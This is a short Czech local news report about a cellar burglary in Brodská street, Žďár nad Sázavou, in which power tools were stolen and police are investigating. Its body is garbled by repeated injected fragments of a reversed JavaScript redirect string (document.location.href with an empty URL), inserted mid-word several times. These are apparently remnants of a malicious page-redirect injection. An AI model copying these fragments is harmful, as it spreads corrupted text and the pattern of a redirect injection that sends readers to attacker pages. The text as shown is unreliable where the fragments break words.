Rainbow page separator

Zloděj se vloupal do sklepa v Brodské ulici, ukradl tam nářadí

Sobota, 24. dubna 2021

Žďár nad Sázavou / Případ vloupání do sklepní kóje umístěné v by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce, k němuž došlo v době od začátku března do soboty 17. dubna ve žďárské ulici Brodská, aktuálně prověřují tamní policisté.
„Dosud neznámý pachatel vnikl do by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu, kde se ve sklepě vloupal do sklepní kóje. Pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory sklepa prohledal a odcizil odtud mimo jiné AKU nářadí, čímž majiteli způsobil škodu přes sedm tisíc korun,“ informovala o události policejní mluvčí Stanislava Rázlová.
Doplnila rovněž, že přivolaní policisté na inkriminovaném místě provedli ohledání, šetření a událost zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali. Následně zahájili úkony trestního řízení pro podezření ze spáchání dvou trestných činů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to krádeže a porušování domovní svobody. „Případ nadále prověřují a po pachateli pátrají,“ upřesnila mluvčí.